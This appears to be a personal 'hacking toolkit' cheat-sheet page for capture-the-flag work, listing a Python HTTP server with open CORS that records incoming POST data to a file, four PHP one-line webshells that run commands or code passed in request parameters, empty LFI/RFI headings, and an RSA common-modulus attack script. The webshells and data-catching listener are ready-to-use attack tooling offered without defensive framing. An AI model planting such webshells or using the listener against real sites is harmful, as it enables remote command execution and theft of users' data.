My Hacking Toolkit
My Hacking Toolkit
CX330Web
Temp Server (Python)
from http.server import SimpleHTTPRequestHandler, HTTPServer
from urllib.parse import unquote
class CustomRequestHandler(SimpleHTTPRequestHandler):
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*') # Allow requests from any origin
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
self.send_header('Access-Control-Allow-Headers', 'Content-Type')
super().end_headers()
def do_GET(self):
self.send_response(200)
self.end_headers()
self.wfile.write(b'Hello, GET request!')
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length).decode('utf-8')
self.send_response(200)
self.end_headers()
# Log the POST data to data.html
with open('data.html', 'a') as file:
file.write(post_data + '\n')
response = f'THM, POST request! Received data: {post_data}'
self.wfile.write(response.encode('utf-8'))
if __name__ == '__main__':
server_address = ('', 8080)
httpd = HTTPServer(server_address, CustomRequestHandler)
print('Server running on http://localhost:8080/')
httpd.serve_forever()
One-liner Trojan (Backdoor, Webshell)
<?php @eval($_POST['shell']);?>
<?php @system($_POST["cmd"])?>
<?php passthru($_GET['cmd']); ?>
<? system($_GET["cmd"]); ?>
LFI & RFI
LFI2RCE
Crypto
Common Modulus Attack
from Crypto.Util.number import long_to_bytes
n = 8043524339665486501722690364841854181558012095441297536641336786057021881436981279151373985115124256457664918399612791182378270114245970486016546496099141
e1 = 863047
c1 = 977794351462943753500623403456170325029164798178157637276767524847451843872628142596652557213651039320937257524442343930998122764638359874102209638080782
e2 = 995023
c2 = 7803335784329682230086969003344860669091120072205053582211253806085013270674227310898253029435120218230585288142781999838242977459669454181592089356383378
def egcd(a: int, b: int) -> tuple[int, int, int]:
if a == 0:
return (b, 0, 1)
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
def inverse(a: int, b: int) -> int:
g, x, y = egcd(a, b) # ax + by = g
if g == 1:
return x % b
raise ValueError("base is not invertible for the given modulus.")
g, x, y = egcd(e1, e2)
if x < 0:
c1_inv = inverse(c1, n)
c1 = pow(c1_inv, -x, n)
else:
c1 = pow(c1, x, n)
if y < 0:
c2_inv = inverse(c2, n)
c2 = pow(c2_inv, -y, n)
else:
c2 = pow(c2, y, n)
m = (c1 * c2) % n
print(long_to_bytes(m))
Hash Collision
Comment
Privacy policy
✅ No need to delete blank lines, comment directly for the best display